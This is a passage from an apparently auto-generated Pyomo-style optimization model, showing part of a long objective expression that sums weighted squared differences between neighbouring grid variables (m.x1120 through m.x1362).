8.11690209768664*m.x1146)**2 + (1.3*m.x1145 - 1.3*m.x1146)**2) + 4.48565498144176*((
8.11690209768664*m.x1120 - 8.11690209768664*m.x1147)**2 + (1.3*m.x1146 - 1.3*m.x1147)**2) +
4.48565498144176*((8.11690209768664*m.x1121 - 8.11690209768664*m.x1148)**2 + (1.3*m.x1147 - 1.3*
m.x1148)**2) + 4.48565498144176*((8.11690209768664*m.x1122 - 8.11690209768664*m.x1149)**2 + (1.3*
m.x1148 - 1.3*m.x1149)**2) + 4.48565498144176*((8.11690209768664*m.x1123 - 8.11690209768664*
m.x1150)**2 + (1.3*m.x1149 - 1.3*m.x1150)**2) + 4.48565498144176*((8.11690209768664*m.x1124 -
8.11690209768664*m.x1151)**2 + (1.3*m.x1150 - 1.3*m.x1151)**2) + 4.48565498144176*((
8.11690209768664*m.x1125 - 8.11690209768664*m.x1152)**2 + (1.3*m.x1151 - 1.3*m.x1152)**2) +
4.48565498144176*((8.11690209768664*m.x1126 - 8.11690209768664*m.x1153)**2 + (1.3*m.x1152 - 1.3*
m.x1153)**2) + 4.48565498144176*((8.11690209768664*m.x1127 - 8.11690209768664*m.x1154)**2 + (1.3*
m.x1153 - 1.3*m.x1154)**2) + 4.48565498144176*((8.11690209768664*m.x1128 - 8.11690209768664*
m.x1155)**2 + (1.3*m.x1154 - 1.3*m.x1155)**2) + 4.48565498144176*((8.11690209768664*m.x1129 -
8.11690209768664*m.x1156)**2 + (1.3*m.x1155 - 1.3*m.x1156)**2) + 4.48565498144176*((
8.11690209768664*m.x1130 - 8.11690209768664*m.x1157)**2 + (1.3*m.x1156 - 1.3*m.x1157)**2) +
4.48565498144176*((8.11690209768664*m.x1131 - 8.11690209768664*m.x1158)**2 + (1.3*m.x1157 - 1.3*
m.x1158)**2) + 4.48565498144176*((8.11690209768664*m.x1132 - 8.11690209768664*m.x1159)**2 + (1.3*
m.x1158 - 1.3*m.x1159)**2) + 4.48565498144176*((8.11690209768664*m.x1133 - 8.11690209768664*
m.x1160)**2 + (1.3*m.x1159 - 1.3*m.x1160)**2) + 4.48565498144176*((8.11690209768664*m.x1134 -
8.11690209768664*m.x1161)**2 + (1.3*m.x1160 - 1.3*m.x1161)**2) + 4.6296035638455*((
8.11690209768664*m.x1136 - 8.11690209768664*m.x1163)**2 + (1.3*m.x1162 - 1.3*m.x1163)**2) +
4.6296035638455*((8.11690209768664*m.x1137 - 8.11690209768664*m.x1164)**2 + (1.3*m.x1163 - 1.3*
m.x1164)**2) + 4.6296035638455*((8.11690209768664*m.x1138 - 8.11690209768664*m.x1165)**2 + (1.3*
m.x1164 - 1.3*m.x1165)**2) + 4.6296035638455*((8.11690209768664*m.x1139 - 8.11690209768664*
m.x1166)**2 + (1.3*m.x1165 - 1.3*m.x1166)**2) + 4.6296035638455*((8.11690209768664*m.x1140 -
8.11690209768664*m.x1167)**2 + (1.3*m.x1166 - 1.3*m.x1167)**2) + 4.6296035638455*((
8.11690209768664*m.x1141 - 8.11690209768664*m.x1168)**2 + (1.3*m.x1167 - 1.3*m.x1168)**2) +
4.6296035638455*((8.11690209768664*m.x1142 - 8.11690209768664*m.x1169)**2 + (1.3*m.x1168 - 1.3*
m.x1169)**2) + 4.6296035638455*((8.11690209768664*m.x1143 - 8.11690209768664*m.x1170)**2 + (1.3*
m.x1169 - 1.3*m.x1170)**2) + 4.6296035638455*((8.11690209768664*m.x1144 - 8.11690209768664*
m.x1171)**2 + (1.3*m.x1170 - 1.3*m.x1171)**2) + 4.6296035638455*((8.11690209768664*m.x1145 -
8.11690209768664*m.x1172)**2 + (1.3*m.x1171 - 1.3*m.x1172)**2) + 4.6296035638455*((
8.11690209768664*m.x1146 - 8.11690209768664*m.x1173)**2 + (1.3*m.x1172 - 1.3*m.x1173)**2) +
4.6296035638455*((8.11690209768664*m.x1147 - 8.11690209768664*m.x1174)**2 + (1.3*m.x1173 - 1.3*
m.x1174)**2) + 4.6296035638455*((8.11690209768664*m.x1148 - 8.11690209768664*m.x1175)**2 + (1.3*
m.x1174 - 1.3*m.x1175)**2) + 4.6296035638455*((8.11690209768664*m.x1149 - 8.11690209768664*
m.x1176)**2 + (1.3*m.x1175 - 1.3*m.x1176)**2) + 4.6296035638455*((8.11690209768664*m.x1150 -
8.11690209768664*m.x1177)**2 + (1.3*m.x1176 - 1.3*m.x1177)**2) + 4.6296035638455*((
8.11690209768664*m.x1151 - 8.11690209768664*m.x1178)**2 + (1.3*m.x1177 - 1.3*m.x1178)**2) +
4.6296035638455*((8.11690209768664*m.x1152 - 8.11690209768664*m.x1179)**2 + (1.3*m.x1178 - 1.3*
m.x1179)**2) + 4.6296035638455*((8.11690209768664*m.x1153 - 8.11690209768664*m.x1180)**2 + (1.3*
m.x1179 - 1.3*m.x1180)**2) + 4.6296035638455*((8.11690209768664*m.x1154 - 8.11690209768664*
m.x1181)**2 + (1.3*m.x1180 - 1.3*m.x1181)**2) + 4.6296035638455*((8.11690209768664*m.x1155 -
8.11690209768664*m.x1182)**2 + (1.3*m.x1181 - 1.3*m.x1182)**2) + 4.6296035638455*((
8.11690209768664*m.x1156 - 8.11690209768664*m.x1183)**2 + (1.3*m.x1182 - 1.3*m.x1183)**2) +
4.6296035638455*((8.11690209768664*m.x1157 - 8.11690209768664*m.x1184)**2 + (1.3*m.x1183 - 1.3*
m.x1184)**2) + 4.6296035638455*((8.11690209768664*m.x1158 - 8.11690209768664*m.x1185)**2 + (1.3*
m.x1184 - 1.3*m.x1185)**2) + 4.6296035638455*((8.11690209768664*m.x1159 - 8.11690209768664*
m.x1186)**2 + (1.3*m.x1185 - 1.3*m.x1186)**2) + 4.6296035638455*((8.11690209768664*m.x1160 -
8.11690209768664*m.x1187)**2 + (1.3*m.x1186 - 1.3*m.x1187)**2) + 4.6296035638455*((
8.11690209768664*m.x1161 - 8.11690209768664*m.x1188)**2 + (1.3*m.x1187 - 1.3*m.x1188)**2) +
4.76638251784576*((8.11690209768664*m.x1163 - 8.11690209768664*m.x1190)**2 + (1.3*m.x1189 - 1.3*
m.x1190)**2) + 4.76638251784576*((8.11690209768664*m.x1164 - 8.11690209768664*m.x1191)**2 + (1.3*
m.x1190 - 1.3*m.x1191)**2) + 4.76638251784576*((8.11690209768664*m.x1165 - 8.11690209768664*
m.x1192)**2 + (1.3*m.x1191 - 1.3*m.x1192)**2) + 4.76638251784576*((8.11690209768664*m.x1166 -
8.11690209768664*m.x1193)**2 + (1.3*m.x1192 - 1.3*m.x1193)**2) + 4.76638251784576*((
8.11690209768664*m.x1167 - 8.11690209768664*m.x1194)**2 + (1.3*m.x1193 - 1.3*m.x1194)**2) +
4.76638251784576*((8.11690209768664*m.x1168 - 8.11690209768664*m.x1195)**2 + (1.3*m.x1194 - 1.3*
m.x1195)**2) + 4.76638251784576*((8.11690209768664*m.x1169 - 8.11690209768664*m.x1196)**2 + (1.3*
m.x1195 - 1.3*m.x1196)**2) + 4.76638251784576*((8.11690209768664*m.x1170 - 8.11690209768664*
m.x1197)**2 + (1.3*m.x1196 - 1.3*m.x1197)**2) + 4.76638251784576*((8.11690209768664*m.x1171 -
8.11690209768664*m.x1198)**2 + (1.3*m.x1197 - 1.3*m.x1198)**2) + 4.76638251784576*((
8.11690209768664*m.x1172 - 8.11690209768664*m.x1199)**2 + (1.3*m.x1198 - 1.3*m.x1199)**2) +
4.76638251784576*((8.11690209768664*m.x1173 - 8.11690209768664*m.x1200)**2 + (1.3*m.x1199 - 1.3*
m.x1200)**2) + 4.76638251784576*((8.11690209768664*m.x1174 - 8.11690209768664*m.x1201)**2 + (1.3*
m.x1200 - 1.3*m.x1201)**2) + 4.76638251784576*((8.11690209768664*m.x1175 - 8.11690209768664*
m.x1202)**2 + (1.3*m.x1201 - 1.3*m.x1202)**2) + 4.76638251784576*((8.11690209768664*m.x1176 -
8.11690209768664*m.x1203)**2 + (1.3*m.x1202 - 1.3*m.x1203)**2) + 4.76638251784576*((
8.11690209768664*m.x1177 - 8.11690209768664*m.x1204)**2 + (1.3*m.x1203 - 1.3*m.x1204)**2) +
4.76638251784576*((8.11690209768664*m.x1178 - 8.11690209768664*m.x1205)**2 + (1.3*m.x1204 - 1.3*
m.x1205)**2) + 4.76638251784576*((8.11690209768664*m.x1179 - 8.11690209768664*m.x1206)**2 + (1.3*
m.x1205 - 1.3*m.x1206)**2) + 4.76638251784576*((8.11690209768664*m.x1180 - 8.11690209768664*
m.x1207)**2 + (1.3*m.x1206 - 1.3*m.x1207)**2) + 4.76638251784576*((8.11690209768664*m.x1181 -
8.11690209768664*m.x1208)**2 + (1.3*m.x1207 - 1.3*m.x1208)**2) + 4.76638251784576*((
8.11690209768664*m.x1182 - 8.11690209768664*m.x1209)**2 + (1.3*m.x1208 - 1.3*m.x1209)**2) +
4.76638251784576*((8.11690209768664*m.x1183 - 8.11690209768664*m.x1210)**2 + (1.3*m.x1209 - 1.3*
m.x1210)**2) + 4.76638251784576*((8.11690209768664*m.x1184 - 8.11690209768664*m.x1211)**2 + (1.3*
m.x1210 - 1.3*m.x1211)**2) + 4.76638251784576*((8.11690209768664*m.x1185 - 8.11690209768664*
m.x1212)**2 + (1.3*m.x1211 - 1.3*m.x1212)**2) + 4.76638251784576*((8.11690209768664*m.x1186 -
8.11690209768664*m.x1213)**2 + (1.3*m.x1212 - 1.3*m.x1213)**2) + 4.76638251784576*((
8.11690209768664*m.x1187 - 8.11690209768664*m.x1214)**2 + (1.3*m.x1213 - 1.3*m.x1214)**2) +
4.76638251784576*((8.11690209768664*m.x1188 - 8.11690209768664*m.x1215)**2 + (1.3*m.x1214 - 1.3*
m.x1215)**2) + 4.89330064653257*((8.11690209768664*m.x1190 - 8.11690209768664*m.x1217)**2 + (1.3*
m.x1216 - 1.3*m.x1217)**2) + 4.89330064653257*((8.11690209768664*m.x1191 - 8.11690209768664*
m.x1218)**2 + (1.3*m.x1217 - 1.3*m.x1218)**2) + 4.89330064653257*((8.11690209768664*m.x1192 -
8.11690209768664*m.x1219)**2 + (1.3*m.x1218 - 1.3*m.x1219)**2) + 4.89330064653257*((
8.11690209768664*m.x1193 - 8.11690209768664*m.x1220)**2 + (1.3*m.x1219 - 1.3*m.x1220)**2) +
4.89330064653257*((8.11690209768664*m.x1194 - 8.11690209768664*m.x1221)**2 + (1.3*m.x1220 - 1.3*
m.x1221)**2) + 4.89330064653257*((8.11690209768664*m.x1195 - 8.11690209768664*m.x1222)**2 + (1.3*
m.x1221 - 1.3*m.x1222)**2) + 4.89330064653257*((8.11690209768664*m.x1196 - 8.11690209768664*
m.x1223)**2 + (1.3*m.x1222 - 1.3*m.x1223)**2) + 4.89330064653257*((8.11690209768664*m.x1197 -
8.11690209768664*m.x1224)**2 + (1.3*m.x1223 - 1.3*m.x1224)**2) + 4.89330064653257*((
8.11690209768664*m.x1198 - 8.11690209768664*m.x1225)**2 + (1.3*m.x1224 - 1.3*m.x1225)**2) +
4.89330064653257*((8.11690209768664*m.x1199 - 8.11690209768664*m.x1226)**2 + (1.3*m.x1225 - 1.3*
m.x1226)**2) + 4.89330064653257*((8.11690209768664*m.x1200 - 8.11690209768664*m.x1227)**2 + (1.3*
m.x1226 - 1.3*m.x1227)**2) + 4.89330064653257*((8.11690209768664*m.x1201 - 8.11690209768664*
m.x1228)**2 + (1.3*m.x1227 - 1.3*m.x1228)**2) + 4.89330064653257*((8.11690209768664*m.x1202 -
8.11690209768664*m.x1229)**2 + (1.3*m.x1228 - 1.3*m.x1229)**2) + 4.89330064653257*((
8.11690209768664*m.x1203 - 8.11690209768664*m.x1230)**2 + (1.3*m.x1229 - 1.3*m.x1230)**2) +
4.89330064653257*((8.11690209768664*m.x1204 - 8.11690209768664*m.x1231)**2 + (1.3*m.x1230 - 1.3*
m.x1231)**2) + 4.89330064653257*((8.11690209768664*m.x1205 - 8.11690209768664*m.x1232)**2 + (1.3*
m.x1231 - 1.3*m.x1232)**2) + 4.89330064653257*((8.11690209768664*m.x1206 - 8.11690209768664*
m.x1233)**2 + (1.3*m.x1232 - 1.3*m.x1233)**2) + 4.89330064653257*((8.11690209768664*m.x1207 -
8.11690209768664*m.x1234)**2 + (1.3*m.x1233 - 1.3*m.x1234)**2) + 4.89330064653257*((
8.11690209768664*m.x1208 - 8.11690209768664*m.x1235)**2 + (1.3*m.x1234 - 1.3*m.x1235)**2) +
4.89330064653257*((8.11690209768664*m.x1209 - 8.11690209768664*m.x1236)**2 + (1.3*m.x1235 - 1.3*
m.x1236)**2) + 4.89330064653257*((8.11690209768664*m.x1210 - 8.11690209768664*m.x1237)**2 + (1.3*
m.x1236 - 1.3*m.x1237)**2) + 4.89330064653257*((8.11690209768664*m.x1211 - 8.11690209768664*
m.x1238)**2 + (1.3*m.x1237 - 1.3*m.x1238)**2) + 4.89330064653257*((8.11690209768664*m.x1212 -
8.11690209768664*m.x1239)**2 + (1.3*m.x1238 - 1.3*m.x1239)**2) + 4.89330064653257*((
8.11690209768664*m.x1213 - 8.11690209768664*m.x1240)**2 + (1.3*m.x1239 - 1.3*m.x1240)**2) +
4.89330064653257*((8.11690209768664*m.x1214 - 8.11690209768664*m.x1241)**2 + (1.3*m.x1240 - 1.3*
m.x1241)**2) + 4.89330064653257*((8.11690209768664*m.x1215 - 8.11690209768664*m.x1242)**2 + (1.3*
m.x1241 - 1.3*m.x1242)**2) + 5.00775685244557*((8.11690209768664*m.x1217 - 8.11690209768664*
m.x1244)**2 + (1.3*m.x1243 - 1.3*m.x1244)**2) + 5.00775685244557*((8.11690209768664*m.x1218 -
8.11690209768664*m.x1245)**2 + (1.3*m.x1244 - 1.3*m.x1245)**2) + 5.00775685244557*((
8.11690209768664*m.x1219 - 8.11690209768664*m.x1246)**2 + (1.3*m.x1245 - 1.3*m.x1246)**2) +
5.00775685244557*((8.11690209768664*m.x1220 - 8.11690209768664*m.x1247)**2 + (1.3*m.x1246 - 1.3*
m.x1247)**2) + 5.00775685244557*((8.11690209768664*m.x1221 - 8.11690209768664*m.x1248)**2 + (1.3*
m.x1247 - 1.3*m.x1248)**2) + 5.00775685244557*((8.11690209768664*m.x1222 - 8.11690209768664*
m.x1249)**2 + (1.3*m.x1248 - 1.3*m.x1249)**2) + 5.00775685244557*((8.11690209768664*m.x1223 -
8.11690209768664*m.x1250)**2 + (1.3*m.x1249 - 1.3*m.x1250)**2) + 5.00775685244557*((
8.11690209768664*m.x1224 - 8.11690209768664*m.x1251)**2 + (1.3*m.x1250 - 1.3*m.x1251)**2) +
5.00775685244557*((8.11690209768664*m.x1225 - 8.11690209768664*m.x1252)**2 + (1.3*m.x1251 - 1.3*
m.x1252)**2) + 5.00775685244557*((8.11690209768664*m.x1226 - 8.11690209768664*m.x1253)**2 + (1.3*
m.x1252 - 1.3*m.x1253)**2) + 5.00775685244557*((8.11690209768664*m.x1227 - 8.11690209768664*
m.x1254)**2 + (1.3*m.x1253 - 1.3*m.x1254)**2) + 5.00775685244557*((8.11690209768664*m.x1228 -
8.11690209768664*m.x1255)**2 + (1.3*m.x1254 - 1.3*m.x1255)**2) + 5.00775685244557*((
8.11690209768664*m.x1229 - 8.11690209768664*m.x1256)**2 + (1.3*m.x1255 - 1.3*m.x1256)**2) +
5.00775685244557*((8.11690209768664*m.x1230 - 8.11690209768664*m.x1257)**2 + (1.3*m.x1256 - 1.3*
m.x1257)**2) + 5.00775685244557*((8.11690209768664*m.x1231 - 8.11690209768664*m.x1258)**2 + (1.3*
m.x1257 - 1.3*m.x1258)**2) + 5.00775685244557*((8.11690209768664*m.x1232 - 8.11690209768664*
m.x1259)**2 + (1.3*m.x1258 - 1.3*m.x1259)**2) + 5.00775685244557*((8.11690209768664*m.x1233 -
8.11690209768664*m.x1260)**2 + (1.3*m.x1259 - 1.3*m.x1260)**2) + 5.00775685244557*((
8.11690209768664*m.x1234 - 8.11690209768664*m.x1261)**2 + (1.3*m.x1260 - 1.3*m.x1261)**2) +
5.00775685244557*((8.11690209768664*m.x1235 - 8.11690209768664*m.x1262)**2 + (1.3*m.x1261 - 1.3*
m.x1262)**2) + 5.00775685244557*((8.11690209768664*m.x1236 - 8.11690209768664*m.x1263)**2 + (1.3*
m.x1262 - 1.3*m.x1263)**2) + 5.00775685244557*((8.11690209768664*m.x1237 - 8.11690209768664*
m.x1264)**2 + (1.3*m.x1263 - 1.3*m.x1264)**2) + 5.00775685244557*((8.11690209768664*m.x1238 -
8.11690209768664*m.x1265)**2 + (1.3*m.x1264 - 1.3*m.x1265)**2) + 5.00775685244557*((
8.11690209768664*m.x1239 - 8.11690209768664*m.x1266)**2 + (1.3*m.x1265 - 1.3*m.x1266)**2) +
5.00775685244557*((8.11690209768664*m.x1240 - 8.11690209768664*m.x1267)**2 + (1.3*m.x1266 - 1.3*
m.x1267)**2) + 5.00775685244557*((8.11690209768664*m.x1241 - 8.11690209768664*m.x1268)**2 + (1.3*
m.x1267 - 1.3*m.x1268)**2) + 5.00775685244557*((8.11690209768664*m.x1242 - 8.11690209768664*
m.x1269)**2 + (1.3*m.x1268 - 1.3*m.x1269)**2) + 5.10732217350308*((8.11690209768664*m.x1244 -
8.11690209768664*m.x1271)**2 + (1.3*m.x1270 - 1.3*m.x1271)**2) + 5.10732217350308*((
8.11690209768664*m.x1245 - 8.11690209768664*m.x1272)**2 + (1.3*m.x1271 - 1.3*m.x1272)**2) +
5.10732217350308*((8.11690209768664*m.x1246 - 8.11690209768664*m.x1273)**2 + (1.3*m.x1272 - 1.3*
m.x1273)**2) + 5.10732217350308*((8.11690209768664*m.x1247 - 8.11690209768664*m.x1274)**2 + (1.3*
m.x1273 - 1.3*m.x1274)**2) + 5.10732217350308*((8.11690209768664*m.x1248 - 8.11690209768664*
m.x1275)**2 + (1.3*m.x1274 - 1.3*m.x1275)**2) + 5.10732217350308*((8.11690209768664*m.x1249 -
8.11690209768664*m.x1276)**2 + (1.3*m.x1275 - 1.3*m.x1276)**2) + 5.10732217350308*((
8.11690209768664*m.x1250 - 8.11690209768664*m.x1277)**2 + (1.3*m.x1276 - 1.3*m.x1277)**2) +
5.10732217350308*((8.11690209768664*m.x1251 - 8.11690209768664*m.x1278)**2 + (1.3*m.x1277 - 1.3*
m.x1278)**2) + 5.10732217350308*((8.11690209768664*m.x1252 - 8.11690209768664*m.x1279)**2 + (1.3*
m.x1278 - 1.3*m.x1279)**2) + 5.10732217350308*((8.11690209768664*m.x1253 - 8.11690209768664*
m.x1280)**2 + (1.3*m.x1279 - 1.3*m.x1280)**2) + 5.10732217350308*((8.11690209768664*m.x1254 -
8.11690209768664*m.x1281)**2 + (1.3*m.x1280 - 1.3*m.x1281)**2) + 5.10732217350308*((
8.11690209768664*m.x1255 - 8.11690209768664*m.x1282)**2 + (1.3*m.x1281 - 1.3*m.x1282)**2) +
5.10732217350308*((8.11690209768664*m.x1256 - 8.11690209768664*m.x1283)**2 + (1.3*m.x1282 - 1.3*
m.x1283)**2) + 5.10732217350308*((8.11690209768664*m.x1257 - 8.11690209768664*m.x1284)**2 + (1.3*
m.x1283 - 1.3*m.x1284)**2) + 5.10732217350308*((8.11690209768664*m.x1258 - 8.11690209768664*
m.x1285)**2 + (1.3*m.x1284 - 1.3*m.x1285)**2) + 5.10732217350308*((8.11690209768664*m.x1259 -
8.11690209768664*m.x1286)**2 + (1.3*m.x1285 - 1.3*m.x1286)**2) + 5.10732217350308*((
8.11690209768664*m.x1260 - 8.11690209768664*m.x1287)**2 + (1.3*m.x1286 - 1.3*m.x1287)**2) +
5.10732217350308*((8.11690209768664*m.x1261 - 8.11690209768664*m.x1288)**2 + (1.3*m.x1287 - 1.3*
m.x1288)**2) + 5.10732217350308*((8.11690209768664*m.x1262 - 8.11690209768664*m.x1289)**2 + (1.3*
m.x1288 - 1.3*m.x1289)**2) + 5.10732217350308*((8.11690209768664*m.x1263 - 8.11690209768664*
m.x1290)**2 + (1.3*m.x1289 - 1.3*m.x1290)**2) + 5.10732217350308*((8.11690209768664*m.x1264 -
8.11690209768664*m.x1291)**2 + (1.3*m.x1290 - 1.3*m.x1291)**2) + 5.10732217350308*((
8.11690209768664*m.x1265 - 8.11690209768664*m.x1292)**2 + (1.3*m.x1291 - 1.3*m.x1292)**2) +
5.10732217350308*((8.11690209768664*m.x1266 - 8.11690209768664*m.x1293)**2 + (1.3*m.x1292 - 1.3*
m.x1293)**2) + 5.10732217350308*((8.11690209768664*m.x1267 - 8.11690209768664*m.x1294)**2 + (1.3*
m.x1293 - 1.3*m.x1294)**2) + 5.10732217350308*((8.11690209768664*m.x1268 - 8.11690209768664*
m.x1295)**2 + (1.3*m.x1294 - 1.3*m.x1295)**2) + 5.10732217350308*((8.11690209768664*m.x1269 -
8.11690209768664*m.x1296)**2 + (1.3*m.x1295 - 1.3*m.x1296)**2) + 5.18982110091268*((
8.11690209768664*m.x1271 - 8.11690209768664*m.x1298)**2 + (1.3*m.x1297 - 1.3*m.x1298)**2) +
5.18982110091268*((8.11690209768664*m.x1272 - 8.11690209768664*m.x1299)**2 + (1.3*m.x1298 - 1.3*
m.x1299)**2) + 5.18982110091268*((8.11690209768664*m.x1273 - 8.11690209768664*m.x1300)**2 + (1.3*
m.x1299 - 1.3*m.x1300)**2) + 5.18982110091268*((8.11690209768664*m.x1274 - 8.11690209768664*
m.x1301)**2 + (1.3*m.x1300 - 1.3*m.x1301)**2) + 5.18982110091268*((8.11690209768664*m.x1275 -
8.11690209768664*m.x1302)**2 + (1.3*m.x1301 - 1.3*m.x1302)**2) + 5.18982110091268*((
8.11690209768664*m.x1276 - 8.11690209768664*m.x1303)**2 + (1.3*m.x1302 - 1.3*m.x1303)**2) +
5.18982110091268*((8.11690209768664*m.x1277 - 8.11690209768664*m.x1304)**2 + (1.3*m.x1303 - 1.3*
m.x1304)**2) + 5.18982110091268*((8.11690209768664*m.x1278 - 8.11690209768664*m.x1305)**2 + (1.3*
m.x1304 - 1.3*m.x1305)**2) + 5.18982110091268*((8.11690209768664*m.x1279 - 8.11690209768664*
m.x1306)**2 + (1.3*m.x1305 - 1.3*m.x1306)**2) + 5.18982110091268*((8.11690209768664*m.x1280 -
8.11690209768664*m.x1307)**2 + (1.3*m.x1306 - 1.3*m.x1307)**2) + 5.18982110091268*((
8.11690209768664*m.x1281 - 8.11690209768664*m.x1308)**2 + (1.3*m.x1307 - 1.3*m.x1308)**2) +
5.18982110091268*((8.11690209768664*m.x1282 - 8.11690209768664*m.x1309)**2 + (1.3*m.x1308 - 1.3*
m.x1309)**2) + 5.18982110091268*((8.11690209768664*m.x1283 - 8.11690209768664*m.x1310)**2 + (1.3*
m.x1309 - 1.3*m.x1310)**2) + 5.18982110091268*((8.11690209768664*m.x1284 - 8.11690209768664*
m.x1311)**2 + (1.3*m.x1310 - 1.3*m.x1311)**2) + 5.18982110091268*((8.11690209768664*m.x1285 -
8.11690209768664*m.x1312)**2 + (1.3*m.x1311 - 1.3*m.x1312)**2) + 5.18982110091268*((
8.11690209768664*m.x1286 - 8.11690209768664*m.x1313)**2 + (1.3*m.x1312 - 1.3*m.x1313)**2) +
5.18982110091268*((8.11690209768664*m.x1287 - 8.11690209768664*m.x1314)**2 + (1.3*m.x1313 - 1.3*
m.x1314)**2) + 5.18982110091268*((8.11690209768664*m.x1288 - 8.11690209768664*m.x1315)**2 + (1.3*
m.x1314 - 1.3*m.x1315)**2) + 5.18982110091268*((8.11690209768664*m.x1289 - 8.11690209768664*
m.x1316)**2 + (1.3*m.x1315 - 1.3*m.x1316)**2) + 5.18982110091268*((8.11690209768664*m.x1290 -
8.11690209768664*m.x1317)**2 + (1.3*m.x1316 - 1.3*m.x1317)**2) + 5.18982110091268*((
8.11690209768664*m.x1291 - 8.11690209768664*m.x1318)**2 + (1.3*m.x1317 - 1.3*m.x1318)**2) +
5.18982110091268*((8.11690209768664*m.x1292 - 8.11690209768664*m.x1319)**2 + (1.3*m.x1318 - 1.3*
m.x1319)**2) + 5.18982110091268*((8.11690209768664*m.x1293 - 8.11690209768664*m.x1320)**2 + (1.3*
m.x1319 - 1.3*m.x1320)**2) + 5.18982110091268*((8.11690209768664*m.x1294 - 8.11690209768664*
m.x1321)**2 + (1.3*m.x1320 - 1.3*m.x1321)**2) + 5.18982110091268*((8.11690209768664*m.x1295 -
8.11690209768664*m.x1322)**2 + (1.3*m.x1321 - 1.3*m.x1322)**2) + 5.18982110091268*((
8.11690209768664*m.x1296 - 8.11690209768664*m.x1323)**2 + (1.3*m.x1322 - 1.3*m.x1323)**2) +
5.25340790999348*((8.11690209768664*m.x1298 - 8.11690209768664*m.x1325)**2 + (1.3*m.x1324 - 1.3*
m.x1325)**2) + 5.25340790999348*((8.11690209768664*m.x1299 - 8.11690209768664*m.x1326)**2 + (1.3*
m.x1325 - 1.3*m.x1326)**2) + 5.25340790999348*((8.11690209768664*m.x1300 - 8.11690209768664*
m.x1327)**2 + (1.3*m.x1326 - 1.3*m.x1327)**2) + 5.25340790999348*((8.11690209768664*m.x1301 -
8.11690209768664*m.x1328)**2 + (1.3*m.x1327 - 1.3*m.x1328)**2) + 5.25340790999348*((
8.11690209768664*m.x1302 - 8.11690209768664*m.x1329)**2 + (1.3*m.x1328 - 1.3*m.x1329)**2) +
5.25340790999348*((8.11690209768664*m.x1303 - 8.11690209768664*m.x1330)**2 + (1.3*m.x1329 - 1.3*
m.x1330)**2) + 5.25340790999348*((8.11690209768664*m.x1304 - 8.11690209768664*m.x1331)**2 + (1.3*
m.x1330 - 1.3*m.x1331)**2) + 5.25340790999348*((8.11690209768664*m.x1305 - 8.11690209768664*
m.x1332)**2 + (1.3*m.x1331 - 1.3*m.x1332)**2) + 5.25340790999348*((8.11690209768664*m.x1306 -
8.11690209768664*m.x1333)**2 + (1.3*m.x1332 - 1.3*m.x1333)**2) + 5.25340790999348*((
8.11690209768664*m.x1307 - 8.11690209768664*m.x1334)**2 + (1.3*m.x1333 - 1.3*m.x1334)**2) +
5.25340790999348*((8.11690209768664*m.x1308 - 8.11690209768664*m.x1335)**2 + (1.3*m.x1334 - 1.3*
m.x1335)**2) + 5.25340790999348*((8.11690209768664*m.x1309 - 8.11690209768664*m.x1336)**2 + (1.3*
m.x1335 - 1.3*m.x1336)**2) + 5.25340790999348*((8.11690209768664*m.x1310 - 8.11690209768664*
m.x1337)**2 + (1.3*m.x1336 - 1.3*m.x1337)**2) + 5.25340790999348*((8.11690209768664*m.x1311 -
8.11690209768664*m.x1338)**2 + (1.3*m.x1337 - 1.3*m.x1338)**2) + 5.25340790999348*((
8.11690209768664*m.x1312 - 8.11690209768664*m.x1339)**2 + (1.3*m.x1338 - 1.3*m.x1339)**2) +
5.25340790999348*((8.11690209768664*m.x1313 - 8.11690209768664*m.x1340)**2 + (1.3*m.x1339 - 1.3*
m.x1340)**2) + 5.25340790999348*((8.11690209768664*m.x1314 - 8.11690209768664*m.x1341)**2 + (1.3*
m.x1340 - 1.3*m.x1341)**2) + 5.25340790999348*((8.11690209768664*m.x1315 - 8.11690209768664*
m.x1342)**2 + (1.3*m.x1341 - 1.3*m.x1342)**2) + 5.25340790999348*((8.11690209768664*m.x1316 -
8.11690209768664*m.x1343)**2 + (1.3*m.x1342 - 1.3*m.x1343)**2) + 5.25340790999348*((
8.11690209768664*m.x1317 - 8.11690209768664*m.x1344)**2 + (1.3*m.x1343 - 1.3*m.x1344)**2) +
5.25340790999348*((8.11690209768664*m.x1318 - 8.11690209768664*m.x1345)**2 + (1.3*m.x1344 - 1.3*
m.x1345)**2) + 5.25340790999348*((8.11690209768664*m.x1319 - 8.11690209768664*m.x1346)**2 + (1.3*
m.x1345 - 1.3*m.x1346)**2) + 5.25340790999348*((8.11690209768664*m.x1320 - 8.11690209768664*
m.x1347)**2 + (1.3*m.x1346 - 1.3*m.x1347)**2) + 5.25340790999348*((8.11690209768664*m.x1321 -
8.11690209768664*m.x1348)**2 + (1.3*m.x1347 - 1.3*m.x1348)**2) + 5.25340790999348*((
8.11690209768664*m.x1322 - 8.11690209768664*m.x1349)**2 + (1.3*m.x1348 - 1.3*m.x1349)**2) +
5.25340790999348*((8.11690209768664*m.x1323 - 8.11690209768664*m.x1350)**2 + (1.3*m.x1349 - 1.3*
m.x1350)**2) + 5.29663380807567*((8.11690209768664*m.x1325 - 8.11690209768664*m.x1352)**2 + (1.3*
m.x1351 - 1.3*m.x1352)**2) + 5.29663380807567*((8.11690209768664*m.x1326 - 8.11690209768664*
m.x1353)**2 + (1.3*m.x1352 - 1.3*m.x1353)**2) + 5.29663380807567*((8.11690209768664*m.x1327 -
8.11690209768664*m.x1354)**2 + (1.3*m.x1353 - 1.3*m.x1354)**2) + 5.29663380807567*((
8.11690209768664*m.x1328 - 8.11690209768664*m.x1355)**2 + (1.3*m.x1354 - 1.3*m.x1355)**2) +
5.29663380807567*((8.11690209768664*m.x1329 - 8.11690209768664*m.x1356)**2 + (1.3*m.x1355 - 1.3*
m.x1356)**2) + 5.29663380807567*((8.11690209768664*m.x1330 - 8.11690209768664*m.x1357)**2 + (1.3*
m.x1356 - 1.3*m.x1357)**2) + 5.29663380807567*((8.11690209768664*m.x1331 - 8.11690209768664*
m.x1358)**2 + (1.3*m.x1357 - 1.3*m.x1358)**2) + 5.29663380807567*((8.11690209768664*m.x1332 -
8.11690209768664*m.x1359)**2 + (1.3*m.x1358 - 1.3*m.x1359)**2) + 5.29663380807567*((
8.11690209768664*m.x1333 - 8.11690209768664*m.x1360)**2 + (1.3*m.x1359 - 1.3*m.x1360)**2) +
5.29663380807567*((8.11690209768664*m.x1334 - 8.11690209768664*m.x1361)**2 + (1.3*m.x1360 - 1.3*
m.x1361)**2) + 5.29663380807567*((8.11690209768664*m.x1335 - 8.11690209768664*m.x1362)**2 + (1.3*
